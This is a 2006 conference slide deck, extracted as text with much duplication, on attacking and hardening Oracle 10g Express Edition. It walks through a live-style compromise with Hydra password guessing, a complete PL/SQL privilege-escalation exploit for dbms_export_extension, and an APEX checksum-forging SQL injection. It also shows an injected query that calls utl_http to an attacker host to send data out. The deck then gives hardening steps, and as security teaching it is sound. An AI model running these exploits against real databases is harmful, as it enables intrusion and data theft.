Hacking and Hardening Oracle XE Hacking and Hardening Oracle Express Edition UK Oracle User Group 14-Nov-2006 Alexander Kornbrust Red Database Security GmbH Agenda Introduction Architecture & Oracle Patch Policy for XE Oracle XE Security Demonstration Accounts & Passwords (unfixed) SQL-Injection dbms_export_extension Default SID XMLDB-HTTP-Server / Oradb-Servlet View-Problems SQL-Injection in APEX Conclusion References Q/A we are here: 1 2 3 4 5 6 7 8 9 10 14.11.2006 -2- Introduction Red-Database-Security GmbH One of the leading companies in Oracle Security More than 250 Oracle security bugs reported Located in Germany, but Services worldwide Security Audits Different Oracle Anti-Hacker-Trainings Software Solutions (Repscan, Matrixay, Orasploit) Founded Spring 2004 we are here: 1 2 3 4 5 6 7 8 9 10 14.11.2006 -3- Introduction ƒ Oracle 10g XE is a free database for Windows and Linux ƒ Limited to 1 GB RAM, 4 GB Data and 1 CPU ƒ XE is a starter database for ƒ Developers ƒ DBAs ƒ Independent Software Vendors ƒ Educational institutions ƒ … Oracle OracleDatabase Database10g 10gExpress ExpressEdition: Edition: Oracle OracleDatabase Database10g 10gExpress ExpressEdition Edition(Oracle (Oracle Database XE) is an entry-level, small-footprint Database XE) is an entry-level, small-footprint database databasebased basedon onthe theOracle OracleDatabase Database10g 10g Release 2 code base that's free to develop, Release 2 code base that's free to develop,deploy, deploy, and distribute; fast to download; and simple to and distribute; fast to download; and simple to administer. administer. Î Sounds like a good choice for saving money we are here: 1 2 3 4 5 6 7 8 9 10 14.11.2006 -4- Introduction ƒ Based on Oracle 10.2.0.1 ƒ Without Java ƒ Oracle Text installed ƒ Easy to use installer we are here: 1 2 3 4 5 6 7 8 9 10 14.11.2006 -5- Oracle Patch Policy XE ƒ For most products Oracle has quarterly patch updates (CPUs) ƒ But for XE Oracle does not deliver security patches ƒ XE is vulnerable against most 10g R2 security bugs fixed with CPU April 2006 and higher Î Ask Oracle for security patches for XE Î Giving a vulnerable product away without security patches is NOT responsible Î Do not use XE in production environments (especially ISVs) we are here: 1 2 3 4 5 6 7 8 9 10 14.11.2006 -6- Architecture Oracle XE Database & HTTP Listener are 8080 running on the same computer 1521 internal Database Firewall TNS-Listener That‘s the reason why often the entire server is exposed to the internet (this happens from time to time even Oracle) we are here: 1 2 3 4 5 6 7 8 9 10 14.11.2006 -7- Oracle XE Security Demonstration Demonstration, how to own an Oracle XE Server connected to the internet we are here: 1 2 3 4 5 6 7 8 9 10 14.11.2006 -8- Oracle XE Security Demonstration ƒ Find an XE server with google we are here: 1 2 3 4 5 6 7 8 9 10 14.11.2006 -9- Oracle XE Security Demonstration ƒ XE Server are often directly connected to the internet and DBAs forget to block port 1521. Now we try to identify the TNS-Listener C:\>lsnrctl C:\>lsnrctl status status h712792.sk.net h712792.sk.net LSNRCTL: LSNRCTL: Version Version 10.2.0.1.0 10.2.0.1.0 -- Production Production on on 13-NOV-2006 13-NOV-2006 Copyright Copyright (c) (c) 1991, 1991, 2005, 2005, Oracle. Oracle. All All rights rights reserved. reserved. Connecting Connecting to to (DESCRIPTION=(CONNECT_DATA=(SERVICE_NAME=))(ADDRESS=(PR (DESCRIPTION=(CONNECT_DATA=(SERVICE_NAME=))(ADDRESS=(PR OTOCOL=TCP)(HOST=85.214.36.42)(PORT=1521))) OTOCOL=TCP)(HOST=85.214.36.42)(PORT=1521))) TNS-01189: TNS-01189: The The listener listener could could not not authenticate authenticate the the user user Î 10g listener with local OS authentication Î Old 8i/9i Listener remote exploits (with set log_file) are no longer working we are here: 1 2 3 4 5 6 7 8 9 10 14.11.2006 - 10 - Oracle XE Security Demonstration ƒ Now we call the URL we found in google http://h712792.sk.net:8080/apex/f?p=200:201:1 http://h712792.sk.net:8080/apex/f?p=200:201:1 534012853711183::NO::: 534012853711183::NO::: we are here: 1 2 3 4 5 6 7 8 9 10 14.11.2006 - 11 - Oracle XE Security Demonstration ƒ And we modify the URL & add the debug flag (replace NO with YES) http://h712792.sk.net:8080/apex/f?p=200:201:1 http://h712792.sk.net:8080/apex/f?p=200:201:1 534012853711183::YES::: 534012853711183::YES::: we are here: 1 2 3 4 5 6 7 8 9 10 14.11.2006 - 12 - Oracle XE Security Demonstration ƒ We modify the APEX-URL and add /oradb/USER/OBJECT ƒ The oradb servlet allows to access tables and views http://h712792.sk.net:8080/oradb/PUBLIC/ALL_U http://h712792.sk.net:8080/oradb/PUBLIC/ALL_U SERS SERS Î We do not have an username/password that’s why we have to guess one (e.g. with a free tool like Hydra) we are here: 1 2 3 4 5 6 7 8 9 10 14.11.2006 - 13 - Oracle XE Security Demonstration ƒ Use Hydra to break the password of a default user (e.g. HR, dbsnmp, system, …) C:\>hydra C:\>hydra -l -l hr hr -P -P xepw.txt xepw.txt -m -m // -s -s 8080 8080 h712792.sk.net h712792.sk.net http-get http-get Hydra Hydra v5.3 v5.3 (c) (c) 2006 2006 by by van van Hauser Hauser // THC THC Hydra Hydra (http://www.thc.org) starting at 2006-11-13 (http://www.thc.org) starting at 2006-11-13 11:34:51 11:34:51 [DATA] [DATA] 25 25 tasks, tasks, 11 servers, servers, 85 85 login login tries tries (l:1/p:25), (l:1/p:25), ~1 ~1 tries per task tries per task [DATA] [DATA] attacking attacking service service http-get http-get on on port port 8080 8080 [STATUS] [STATUS] attack attack finished finished for for h712792.sk.net h712792.sk.net [8080][www] host: 84.213.16.32 [8080][www] host: 84.213.16.32 login: login: hr hr password: password: XX XX Hydra Hydra (http://www.thc.org) (http://www.thc.org) finished finished at at 2006-11-13 2006-11-13 11:34:52 11:34:52 Î Hydra found a working username & password we are here: 1 2 3 4 5 6 7 8 9 10 Î Login (attempts) are not logged in the listener.log 14.11.2006 - 14 - Oracle XE Security Demonstration ƒ Because XE has a default SID, we have everything to login with SQL*Plus & Easy Connect C:\> C:\>sqlplus sqlplus hr/XX@//h712792.sk.net/XE hr/XX@//h712792.sk.net/XE SQL*Plus: SQL*Plus: Release Release 10.2.0.1.0 10.2.0.1.0 -- Production Production on on Nov Nov 13 13 2006 2006 Copyright Copyright (c) (c) 1982, 1982, 2005, 2005, Oracle. Oracle. All All rights rights reserved. reserved. Connected Connected to: to: Oracle Database Oracle Database 10g 10g Express Express Edition Edition Release Release 10.2.0.1.0 10.2.0.1.0 SQL> SQL> select select ** from from v$version; v$version; BANNER BANNER ------------------------------------------------------------------------------------------------------------------Oracle Oracle Database Database 10g 10g Express Express Edition Edition Release Release 10.2.0.1.0 10.2.0.1.0 PL/SQL Release 10.2.0.1.0 Production PL/SQL Release 10.2.0.1.0 - Production CORE 10.2.0.1.0 Production CORE 10.2.0.1.0 Production TNS TNS for for Linux: Linux: Version Version 10.2.0.1.0 10.2.0.1.0 -- Production Production NLSRTL Version 10.2.0.1.0 Production NLSRTL Version 10.2.0.1.0 - Production SQL> SQL> we are here: 1 2 3 4 5 6 7 8 9 10 14.11.2006 - 15 - Oracle XE Security Demonstration ƒ Check the session roles of the HR user SQL> SQL> select select ** from from session_roles; session_roles; ROLES ROLES ----------------------------------------------------------------------------------------------------------------CONNECT CONNECT RESOURCE RESOURCE Î Resource role is granted to HR Î An attacker can now create procedures, required for some SQL Injection exploits Î Exploit for dbms_export_extension works we are here: 1 2 3 4 5 6 7 8 9 10 14.11.2006 - 16 - Oracle XE Security Demonstration ƒ The next step is the privilege escalation C:\> C:\>sqlplus sqlplus hr/XX@//h712792.sk.net/XE hr/XX@//h712792.sk.net/XE SQL*Plus: SQL*Plus: Release Release 10.2.0.1.0 10.2.0.1.0 -- Production Production on on Nov Nov 13 13 2006 2006 Copyright (c) 1982, 2005, Oracle. All rights reserved. Copyright (c) 1982, 2005, Oracle. All rights reserved. Connected Connected to: to: Oracle Oracle Database Database 10g 10g Express Express Edition Edition Release Release 10.2.0.1.0 10.2.0.1.0 SQL> SQL> --- USE USE dbms_export_extension dbms_export_extension Exploit Exploit to to become become DBA DBA Î After reconnecting to the database, we are now DBA we are here: 1 2 3 4 5 6 7 8 9 10 14.11.2006 - 17 - Oracle XE Security Demonstration ƒ Check database for other weak passwords with checkpwd c:\> c:\> checkpwd.exe checkpwd.exe hr/xx@//h712792.sk.net/XE hr/xx@//h712792.sk.net/XE pwd.txt pwd.txt Checkpwd Checkpwd 1.21 1.21 -- (c) (c) 2006 2006 by by Red-Database-Security Red-Database-Security GmbH GmbH retrieving users and password hash values retrieving users and password hash values checking checking passwords passwords USER1 USER1 welcome1 welcome1 [OPEN] [OPEN] USER2 OK [OPEN] USER2 OK [OPEN] SYS OK SYS OK [OPEN] [OPEN] SYSTEM elcaro1 SYSTEM elcaro1 [OPEN] [OPEN] ANONYMOUS OK ANONYMOUS OK [OPEN] [OPEN] HR has weak password HR has weak password HR HR [OPEN] [OPEN] […] […] FLOWS_FILES FLOWS_FILES has has weak weak password password ORACLE ORACLE [EXPIRED [EXPIRED && LOCKED] LOCKED] CTXSYS has weak password ORACLE [EXPIRED & LOCKED] CTXSYS has weak password ORACLE [EXPIRED & LOCKED] DBSNMP DBSNMP has has weak weak password password DBSNMP DBSNMP [EXPIRED [EXPIRED && LOCKED] LOCKED] FLOWS_020100 has weak password ORACLE [EXPIRED FLOWS_020100 has weak password ORACLE [EXPIRED && LOCKED] LOCKED] XDB has weak password ORACLE [EXPIRED & LOCKED] XDB has weak password ORACLE [EXPIRED & LOCKED] we are here: 1 2 3 4 5 6 7 8 9 10 Done. Done. Summary: Summary: Passwords :: 21946905 Passwords checked checked 21946905 Weak Weak passwords passwords found found :: 10 10 Elapsed Elapsed time time (min:sec) (min:sec) :: 1:03 1:03 Passwords / second : 353475 Passwords / second : 353475 14.11.2006 - 18 - Oracle XE Security Demonstration ƒ Now we are DBA and able to run operating system commands (e.g. initiate a reverse shell with xterm or netcat), export the entire database, … ƒ On windows we have full access to the entire OS with SYSTEM privileges Server 0wned !!! we are here: 1 2 3 4 5 6 7 8 9 10 14.11.2006 - 19 - Hardening XE ƒ Usernames & Passwords ƒ XE Default SID ƒ oradb-Servlet ƒ SQL Injection in PL/SQL packages ƒ View problems ƒ SQL Injection APEX we are here: 1 2 3 4 5 6 7 8 9 10 14.11.2006 - 20 - Accounts & Passwords ƒ Good and strong passwords are important for protecting databases we are here: 1 2 3 4 5 6 7 8 9 10 14.11.2006 - 21 - Locked Accounts ƒ Oracle XE creates and locks the following default users SQL> SQL> select select username username from from dba_users dba_users where where account_status like '%LOCKED%'; account_status like '%LOCKED%'; USERNAME USERNAME ----------------------------------------------------------XDB XDB FLOWS_020100 FLOWS_020100 DIP DIP OUTLN OUTLN CTXSYS CTXSYS MDSYS MDSYS FLOWS_FILES FLOWS_FILES TSMSYS TSMSYS 88 rows rows selected. selected. ƒ Locking database users is often recommended for security reasons but not the best approach we are here: 1 2 3 4 5 6 7 8 9 10 14.11.2006 - 22 - Locked Accounts ƒ Locked database users can be used to enumerate installed database components without having valid user credentials sqlplus sqlplus mdsys/random mdsys/random SQL*Plus: SQL*Plus: Release Release 10.2.0.1.0 10.2.0.1.0 -- Production Production on on Nov Nov 13 13 2006 2006 Copyright Copyright (c) (c) 1982, 1982, 2005, 2005, Oracle. Oracle. All All rights rights reserved. reserved. ERROR: ERROR: ORA-28000: ORA-28000: the the account account is is locked locked Î Component MDSYS is installed we are here: 1 2 3 4 6 7 8 9 10 Î Setting invalid Oracle passwords and unlocking user accounts is more secure 5 14.11.2006 - 23 - Locked Accounts / Version numbers ƒ Sometimes it’s even possible to identify version numbers of products (e.g. APEX) with a simple login sqlplus sqlplus FLOWS_020100/random FLOWS_020100/random SQL*Plus: SQL*Plus: Release Release 10.2.0.1.0 10.2.0.1.0 -- Production Production on on Nov Nov 13 13 2006 2006 Copyright Copyright (c) (c) 1982, 1982, 2005, 2005, Oracle. Oracle. All All rights rights reserved. reserved. ERROR: ERROR: ORA-28000: ORA-28000: the the account account is is locked locked Î APEX 2.10 is installed (FLOWS_020100) Î APEX always encodes the version number we are here: 1 2 3 4 5 6 7 8 9 10 Î Never encode version numbers in usernames 14.11.2006 - 24 - Invalid Passwords & New Profile ƒ To avoid information disclosure from the ORA-28000 error messages it is better to set an invalid password and unlock all locked user accounts ƒ To avoid the automatically lock of accounts after 10 invalid login attempts (default setting in XE) you should create a new profile for invalid profiles SQL> SQL> create create profile profile invalid invalid limit limit failed_login_attempts failed_login_attempts unlimited;; unlimited;; SQL> SQL> alter alter user user dbsnmp dbsnmp identified identified by by values values 'invalid_pw' account unlock profile 'invalid_pw' account unlock profile unlimited; unlimited; k er Ha c . o &C we are here: 1 2 3 4 5 6 7 8 9 10 14.11.2006 - 25 - Exploit dbms_export_extension ƒ The package dbms_export_extension delivered with XE is vulnerable against SQL Injection (exploit posted on BugTraq in April 2006) ƒ Create package & inject this into dbms_export_extension CREATE CREATE OR OR REPLACE REPLACE PACKAGE EXPLOIT PACKAGE EXPLOIT AUTHID AUTHID CURRENT_USER CURRENT_USER IS IS FUNCTION FUNCTION ODCIIndexGetMetadata ODCIIndexGetMetadata (oindexinfo (oindexinfo SYS.odciindexinfo,P3 SYS.odciindexinfo,P3 VARCHAR2,p4 VARCHAR2,p4 VARCHAR2,env VARCHAR2,env SYS.odcienv) SYS.odcienv) RETURN NUMBER; RETURN NUMBER; END; END; // we are here: 1 2 3 4 5 6 7 8 9 10 14.11.2006 - 26 - Exploit dbms_export_extension CREATE CREATE OR OR REPLACE REPLACE PACKAGE PACKAGE BODY BODY EXPLOIT EXPLOIT IS IS FUNCTION FUNCTION ODCIIndexGetMetadata ODCIIndexGetMetadata (oindexinfo (oindexinfo SYS.odciindexinfo,P3 SYS.odciindexinfo,P3 VARCHAR2,p4 VARCHAR2,p4 VARCHAR2,env VARCHAR2,env SYS.odcienv) SYS.odcienv) RETURN NUMBER RETURN NUMBER IS IS pragma pragma autonomous_transaction; autonomous_transaction; BEGIN BEGIN EXECUTE EXECUTE IMMEDIATE IMMEDIATE 'GRANT 'GRANT DBA DBA TO TO HR'; HR'; COMMIT; COMMIT; RETURN(1); RETURN(1); END; END; END; END; // we are here: 1 2 3 4 5 6 7 8 9 10 14.11.2006 - 27 - Exploit dbms_export_extension DECLARE DECLARE INDEX_NAME INDEX_NAME VARCHAR2(200);INDEX_SCHEMA VARCHAR2(200);INDEX_SCHEMA VARCHAR2(200); VARCHAR2(200); TYPE_NAME VARCHAR2(200); TYPE_SCHEMA VARCHAR2(200); TYPE_NAME VARCHAR2(200); TYPE_SCHEMA VARCHAR2(200); VERSION VERSION VARCHAR2(200); VARCHAR2(200); NEWBLOCK NEWBLOCK PLS_INTEGER; PLS_INTEGER; GMFLAGS NUMBER; v_Return VARCHAR2(200); GMFLAGS NUMBER; v_Return VARCHAR2(200); BEGIN BEGIN INDEX_NAME INDEX_NAME := := 'A1'; 'A1'; INDEX_SCHEMA INDEX_SCHEMA := := 'HR'; 'HR'; TYPE_NAME TYPE_NAME := := 'EXPLOIT'; 'EXPLOIT'; TYPE_SCHEMA TYPE_SCHEMA := := 'HR'; 'HR'; VERSION VERSION := := '10.2.0.1.0'; '10.2.0.1.0'; GMFLAGS := 1; GMFLAGS := 1; v_Return v_Return := := SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_METADATA( SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_METADATA( INDEX_NAME INDEX_NAME => => INDEX_NAME, INDEX_NAME, INDEX_SCHEMA INDEX_SCHEMA => => INDEX_SCHEMA, INDEX_SCHEMA, TYPE_NAME => TYPE_NAME, TYPE_SCHEMA => TYPE_SCHEMA, TYPE_NAME => TYPE_NAME, TYPE_SCHEMA => TYPE_SCHEMA, VERSION VERSION => => VERSION, VERSION, NEWBLOCK NEWBLOCK =>NEWBLOCK, =>NEWBLOCK, GMFLAGS GMFLAGS => => GMFLAGS ); GMFLAGS ); END; END; // we are here: 1 2 3 4 5 6 7 8 9 10 14.11.2006 - 28 - dbms_export_extension / protection ƒ Due to the lack of patches it is necessary to revoke public execute privilege in XE from public ƒ To avoid export problems it is necessary to grant the privileges to the role DBA SQL> SQL> revoke revoke execute execute on on sys.dbms_export_extension sys.dbms_export_extension from from public; public; SQL> SQL> grant grant execute execute on on sys.dbms_export_extension sys.dbms_export_extension to to DBA; DBA; we are here: 1 2 3 4 5 6 7 8 9 10 14.11.2006 - 29 - XE default SID ƒ The default SID of every Oracle Express Edition is XE ƒ This knowledge allows attackers to connect to the database. Without the knowledge of the SID it is not possible to connect via OCI to the database sqlplus sqlplus user/password@//10.1.1.117/XE; user/password@//10.1.1.117/XE; Î Change the SID to a different value (8 characters, random) we are here: 1 2 3 4 6 7 8 9 10 Î See asktom.oracle.com for a description 5 14.11.2006 - 30 - Default SID ƒ The default SID of every Oracle Express Edition is XE ƒ Default SIDs can be guessed ƒ In 10g with local OS authentication the remote status command does no longer work C:\>lsnrctl C:\>lsnrctl status status 192.168.2.234 192.168.2.234 LSNRCTL LSNRCTL Version Version 10.2.0.1.0 10.2.0.1.0 -- Production Production on on 13-NOV-2006 13-NOV-2006 Copyright Copyright (c) (c) 1991, 1991, 2005, 2005, Oracle. Oracle. All All rights rights reserved. reserved. Connecting Connecting to to (DESCRIPTION=(CONNECT_DATA=(SERVICE_NAME=))(ADDRESS=(PR (DESCRIPTION=(CONNECT_DATA=(SERVICE_NAME=))(ADDRESS=(PR OTOCOL=TCP)(HOST=192.168.2.234)(PORT=1521))) OTOCOL=TCP)(HOST=192.168.2.234)(PORT=1521))) TNS-01189: TNS-01189: The The listener listener could could not not authenticate authenticate the the user user we are here: 1 2 3 4 5 6 7 8 9 10 14.11.2006 - 31 - Default SID ƒ With SIDGUESS you can guess short or simple SIDs C:\> C:\> sidguess sidguess host=xp10104 host=xp10104 port=1521 port=1521 sidfile=sid.txt sidfile=sid.txt Sidguess Sidguess 1.00 1.00 -- (c) (c) 2006 2006 by by Red-Database-Security Red-Database-Security GmbH GmbH Oracle Security Consulting, Security Audits & Trainings Oracle Security Consulting, Security Audits & Trainings http://www.red-database-security.com http://www.red-database-security.com SID SID found: found: XE XE ƒ Now we can connect to the database with SQL*Plus we are here: 1 2 3 4 5 6 7 8 9 10 14.11.2006 - 32 - Default SID & Oracle Easy Connect ƒ To connect to an Oracle database we need ƒ Username (e.g. dbsnmp or system) ƒ Password ƒ SID or Servicename (XE) ƒ IP-Address ƒ Portnumber (default: 1521) Î Then we can use Oracle easy connect to connect to the database without tnsnames. sqlplus sqlplus dbsnmp/mypw@//192.168.2.234:1521/XE; dbsnmp/mypw@//192.168.2.234:1521/XE; we are here: 1 2 3 4 5 6 7 8 9 10 14.11.2006 - 33 - Default SID / Protection ƒ Change the default SID to a long (8 character) and random value (not in a dictionary) ƒ asktom.oracle.com explains how to do this ƒ Be careful doing this (make backups) we are here: 1 2 3 4 5 6 7 8 9 10 14.11.2006 - 34 - Block all ports except of HTTP ƒ Instead of changing the SID you could also block the incoming requests on port 1521 ƒ Block all ports (e.g. 1521) except of the http port (e.g. 80 or 8080) with the Windows Firewall or Linux Firewall we are here: 1 2 3 4 5 6 7 8 9 10 14.11.2006 - 35 - Oradb-Servlet ƒ By default, Oracle XE, is installing the oradb servlet ƒ This servlet allows to access tables/views via the browser ƒ Works even if port 1521 is blocked http://192.168.2.234:8080/oradb/PUBLIC/ALL_USERS http://192.168.2.234:8080/oradb/PUBLIC/ALL_USERS we are here: 1 2 3 4 5 6 7 8 9 10 14.11.2006 - 36 - Oradb-Servlet ƒ Now we can access every table/view accessible to our database user we are here: 1 2 3 4 5 6 7 8 9 10 14.11.2006 - 37 - Oradb-Servlet ƒ XE databases not using APEX/HTMLDB can disable XMLDB completely in the init.ora/pfile ƒ Remove the line dispatchers from init.ora and restart the database dispatchers='(PROTOCOL=TCP)(SERVICE=XDB)' dispatchers='(PROTOCOL=TCP)(SERVICE=XDB)' we are here: 1 2 3 4 5 6 7 8 9 10 14.11.2006 - 38 - Oradb-Servlet ƒ Or it’s possible to change the HTTP port to 0 or a different value with the package dbms_xdb --- change change HTTP HTTP port port from from 8080 8080 to to 00 call call dbms_xdb.cfg_update(updateXML(dbms_xdb.cfg_get(), dbms_xdb.cfg_update(updateXML(dbms_xdb.cfg_get(), '/xdbconfig/sysconfig/protocolconfig/httpconfig/h '/xdbconfig/sysconfig/protocolconfig/httpconfig/h ttp-port/text()', ttp-port/text()', 0)); 0)); --- refresh refresh settings settings exec exec dbms_xdb.cfg_refresh; dbms_xdb.cfg_refresh; we are here: 1 2 3 4 5 6 7 8 9 10 14.11.2006 - 39 - Oradb-Servlet ƒ To change the database role which is necessary to access the database role DECLARE DECLARE doc doc XMLType; XMLType; doc2 doc2 XMLType; XMLType; doc3 doc3 XMLType; XMLType; BEGIN BEGIN doc doc := := DBMS_XDB.cfg_get(); DBMS_XDB.cfg_get(); SELECT SELECT updateXML(doc, updateXML(doc, '/xdbconfig/sysconfig/protocolconfig/httpconfig/webappco '/xdbconfig/sysconfig/protocolconfig/httpconfig/webappco nfig/servletconfig/ nfig/servletconfig/ servlet-list/servlet[servletservlet-list/servlet[servletname="DBUriServlet"]/security-role-ref/role-name/ name="DBUriServlet"]/security-role-ref/role-name/ text()', text()', 'servlet-users') 'servlet-users') INTO INTO doc2 doc2 FROM FROM DUAL; DUAL; SELECT SELECT updateXML(doc2, updateXML(doc2, '/xdbconfig/sysconfig/protocolconfig/httpconfig/webappco '/xdbconfig/sysconfig/protocolconfig/httpconfig/webappco nfig/servletconfig/ nfig/servletconfig/ servlet-list/servlet[servletservlet-list/servlet[servletname="DBUriServlet"]/security-role-ref/role-link/ name="DBUriServlet"]/security-role-ref/role-link/ text()', text()', 'servlet-users') 'servlet-users') INTO INTO doc3 doc3 FROM FROM DUAL; DUAL; we are here: 1 2 3 4 5 6 7 8 9 10 14.11.2006 DBMS_XDB.cfg_update(doc3); DBMS_XDB.cfg_update(doc3); COMMIT; COMMIT; END; END; // - 40 - Oradb-Servlet ƒ On XE databases not using the oradb-Servlet it’s possible to disable the oradb-Servlet or BEGIN BEGIN URIFACTORY.unregisterURLHandler('oradb'); URIFACTORY.unregisterURLHandler('oradb'); END; END; // we are here: 1 2 3 4 5 6 7 8 9 10 14.11.2006 - 41 - View Problems I ƒ In April 2006 an Oracle Support analyst posted a note concerning an Oracle view problem. we are here: 1 2 3 4 5 6 7 8 9 10 14.11.2006 - 42 - View Problems I ƒ This problem allows to insert/update/delete data via views without having the privileges SQL> SQL> CREATE CREATE VIEW VIEW emp_emp emp_emp AS AS SELECT SELECT e1.ename, e1.ename, e1.empno, e1.empno, e1.deptno e1.deptno FROM FROM scott.emp scott.emp e1, e1, scott.emp scott.emp e2 e2 WHERE WHERE e1.empno e1.empno == e2.empno; e2.empno; SQL> SQL> delete delete from from emp_emp; emp_emp; 14 14 rows rows deleted deleted Î This bug was fixed in non-XE Oracle versions with CPU July 2006 we are here: 1 2 3 4 6 7 8 9 10 Î Be careful with the “CREATE VIEW” privilege 5 14.11.2006 - 43 - View Problems II ƒ I was able to identify a new related but different bug using inline view a few weeks later ƒ No “CREATE VIEW” privilege required ƒ No workarounds possible insert insert into into ((*** *** specially specially crafted crafted inline inline view view *** *** *** *** on on SCOTT.EMP SCOTT.EMP *** *** )) values values (999,'HACKER','HACKER',0,sysdate,10000,0,10); (999,'HACKER','HACKER',0,sysdate,10000,0,10); we are here: 1 2 3 4 6 7 8 9 10 Î Fixed in other Oracle versions with CPU October 2006 5 14.11.2006 - 44 - View Problems II ƒ This technique could be used to modify APEX program code from other people by updating their LOV update update (*** (*** specially specially crafted crafted inline inline view view *** *** *** *** on on FLOWS_020100.WWV_FLOW_LISTS_OF_VALUES$ FLOWS_020100.WWV_FLOW_LISTS_OF_VALUES$ *** *** )) set set LOV_QUERY LOV_QUERY == 'select 'select utl_http.request(''http://hacker/USER=''||user) utl_http.request(''http://hacker/USER=''||user) from from dual' dual' where where lower(LOV_QUERY) lower(LOV_QUERY) like like '%select%' '%select%' // we are here: 1 2 3 4 5 6 7 8 9 10 14.11.2006 - 45 - View Problems II ƒ Or an attacker could delete all the LOVs delete delete from from (( *** *** specially specially crafted crafted inline inline view view *** *** *** *** on on FLOWS_020100.WWV_FLOW_LISTS_OF_VALUES$ FLOWS_020100.WWV_FLOW_LISTS_OF_VALUES$ *** *** )) // we are here: 1 2 3 4 5 6 7 8 9 10 14.11.2006 - 46 - View Problems / Mitigation To mitigate the risk with views it’s possible to be careful with the privilege “CREATE VIEW” But there are no workarounds available for the vulnerability related to inline views Try to restrict the possibility to run “free SQL” For this problem you need patches !!! But there are not available !!! we are here: 1 2 3 4 5 6 7 8 9 10 14.11.2006 - 47 - SQL Injection in APEX ƒ APEX 1.5-2.1 contains a remote exploitable SQL Injection http://xe:8080/apex/wwv_flow_utilities.gen_popup_list?p http://xe:8080/apex/wwv_flow_utilities.gen_popup_list?p _filter=&p_name=p_t02&p_element_index=1&p_hidden_elem_n _filter=&p_name=p_t02&p_element_index=1&p_hidden_elem_n ame=p_t01&p_form_index=0&p_max_elements=&p_escape_html= ame=p_t01&p_form_index=0&p_max_elements=&p_escape_html= &p_ok_to_query=YES&p_flow_id=100&p_page_id=11&p_session &p_ok_to_query=YES&p_flow_id=100&p_page_id=11&p_session _id=15108399238201864297&p_eval_value=&p_return_key=YES _id=15108399238201864297&p_eval_value=&p_return_key=YES &p_translation=N&p_lov=select%20cust_last_name%20||%20' &p_translation=N&p_lov=select%20cust_last_name%20||%20' %2C%20'%20||%20cust_first_name%20d%2C%20customer_id%20r %2C%20'%20||%20cust_first_name%20d%2C%20customer_id%20r %20from%20demo_customers%20order%20by%20cust_last_name& %20from%20demo_customers%20order%20by%20cust_last_name& p_lov_checksum=82C7EFB6FA3A2FA2C6E1A70FB63BB064 p_lov_checksum=82C7EFB6FA3A2FA2C6E1A70FB63BB064 Oracle is using a checksum to protect the SQL statement from modification we are here: 1 2 3 4 5 6 7 8 9 10 14.11.2006 - 48 - SQL Injection in APEX ƒ Modifying the SQL statement throws an error message because the checksum does not match ƒ The size of the p_lov_checksum looks like MD5 ƒ By using an interception package for dbms_obfuscation_toolkit it’s possible to see all parameters passed to the MD5 function 15108399238201864297selectcust_last_namecust_ 15108399238201864297selectcust_last_namecust_ first_namedcustomer_idrfromdemo_customersorde first_namedcustomer_idrfromdemo_customersorde rby14925112F685C139A rby14925112F685C139A we are here: 1 2 3 4 5 6 7 8 9 10 14.11.2006 - 49 - SQL Injection in APEX 15108399238201864297selectcust_last_namecust_ 15108399238201864297selectcust_last_namecust_ first_namedcustomer_idrfromdemo_customersorde first_namedcustomer_idrfromdemo_customersorde rby14925112F685C139A rby14925112F685C139A ƒ The first value is the sessionID (available in the URL) ƒ The second value is the SQL statement without whitespaces ƒ The third parameter is a value from the cookie ƒ Now we have everything to recalculate the MD5 checksum ƒ This checksum can be used in the URL for the new SQL statement we are here: 1 2 3 4 5 6 7 8 9 10 14.11.2006 - 50 - SQL Injection in APEX Running the URL with a modified statement and the new checksum works perfectly http://xe:8080/apex/wwv_flow_utilities.gen_popup_list?p http://xe:8080/apex/wwv_flow_utilities.gen_popup_list?p _filter=&p_name=p_t02&p_element_index=1&p_hidden_elem_n _filter=&p_name=p_t02&p_element_index=1&p_hidden_elem_n ame=p_t01&p_form_index=0&p_max_elements=&p_escape_html= ame=p_t01&p_form_index=0&p_max_elements=&p_escape_html= &p_ok_to_query=YES&p_flow_id=100&p_page_id=11&p_session &p_ok_to_query=YES&p_flow_id=100&p_page_id=11&p_session _id=15108399238201864297&p_eval_value=&p_return_key=YES _id=15108399238201864297&p_eval_value=&p_return_key=YES &p_translation=N&p_lov=select%20*%20from%20all_users&p_ &p_translation=N&p_lov=select%20*%20from%20all_users&p_ lov_checksum=B43B39DF8A95E478BB2BAE9E0C3F0D0E lov_checksum=B43B39DF8A95E478BB2BAE9E0C3F0D0E we are here: 1 2 3 4 5 6 7 8 9 10 14.11.2006 - 51 - Conclusion Block all unneeded ports depending of your application (1521 or 80/8080) Use invalid database passwords and unlock accounts Use a special profile for invalid accounts Drop unneeded accounts if not needed Disable oradb servlet and XMLDB if not needed Upgrade APEX to 2.2.1 Revoke dbms_export_extension from Public and grant it to DBA Be careful with “CREATE VIEW” and “CREATE PROCEDURE” privilege Ask Oracle for SECURITY PATCHES for XE we are here: 1 2 3 4 5 6 7 8 9 10 14.11.2006 - 52 - References Checkpwd 1.21 – Free Oracle Password Checker http://www.red-database-security.com/software/checkpwd.html Hydra 5.3 – Password guesser http://www.thc.org/thc-hydra/ Exploit dbms_export_extension http://www.red-database-security.com/exploits/oracle-sqlinjection-oracle-dbms_export_extension.html Oracle SIDGuess http://www.red-databasesecurity.com/whitepaper/oracle_guess_sid.html How to change an Oracle SID http://asktom.oracle.com/pls/ask/f?p=4950:8:::::F4950_P8_DISPLA YID:318216852435 Advisory SQL Injection in Oracle APEX http://www.red-databasesecurity.com/advisory/oracle_apex_sql_injection_wwv_flow_utilit ies.html we are here: 1 2 3 4 5 6 7 8 9 10 14.11.2006 - 53 - Q&A Q&A we are here: 1 2 3 4 5 6 7 8 9 10 14.11.2006 - 54 - Contact Alexander Kornbrust Business Director Red-Database-Security GmbH Bliesstrasse 16 D-66538 Neunkirchen Germany Phone: Mobile: Fax: +49 (6821) 95 17 637 +49 (174) 98 78 118 +49 (6821) 91 27 354 E-Mail: Web: info@red-database-security.com www.red-database-security.com we are here: 1 2 3 4 5 6 7 8 9 10 14.11.2006 - 55 -